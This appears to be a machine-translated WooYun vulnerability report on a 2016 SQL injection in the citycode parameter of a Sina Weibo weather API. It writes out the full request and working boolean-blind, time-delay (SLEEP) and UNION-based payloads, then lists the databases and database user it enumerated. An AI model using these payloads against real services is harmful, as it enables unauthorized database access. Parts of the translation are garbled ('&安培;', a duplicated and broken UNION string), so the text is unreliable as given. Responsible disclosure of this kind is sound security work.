漏洞标题 新浪微博站MySQL注入(支持三种查询方式) 相关制造商 新浪微博 漏洞作者 Aasron 提交时间 2016-04-27 16: 53 公共时间 2016-06-13 19: 00 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 Php +字符型注入,注入技术,Mysql 漏洞详细信息 GET /api.php?idfa=xxxx&lang=zh-Hans-CN&limit=20&pv=3.929&ts=1461744953.516815&sv=9.310&device_id=xx&method=comments.get&resolution=1242 %2A2208&安培;康恩=1&安培; tqt_userid=88511248&安培;签=XX&安培; UID=XXX&安培;载体=1&安培;时区=GMT%2B8&安培; PID=游离安培; citycode=CHXX0016&安培; API_KEY=517276d5c1d3c&安培; PT=3010&安培;设备=iPhone&安培; PD=tq HTTP/1.1 主持人: tqt.weibo.cn 接受语言: zh-Hans,en-us 用户代理: 连接:关闭 Accept-Encoding: gzip,deflate 播放xxx是我的敏感信息。 注射参数#citycode 漏洞证明: 布尔盲:'和6109=6109 AND'eHNv'='eHNy 延迟注射:'和(SELECT * FROM(SELECT(SLEEP(5)))* uk)和'zYAE'='zYAE 联合查询:'UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855,NULL,NULL,NULL,CONCAT(0x716a6b6b71,0x6e5a67744172494e4e6342744c70784a716e674855 可用的数据库[3]: [*] information_schema [*]测试 [*] tianqitong 当前数据库:tianqitong 当前数据库用户:'[email protected]/*%' 修理计划: 过滤 版权声明:请注明出处Aasron @乌云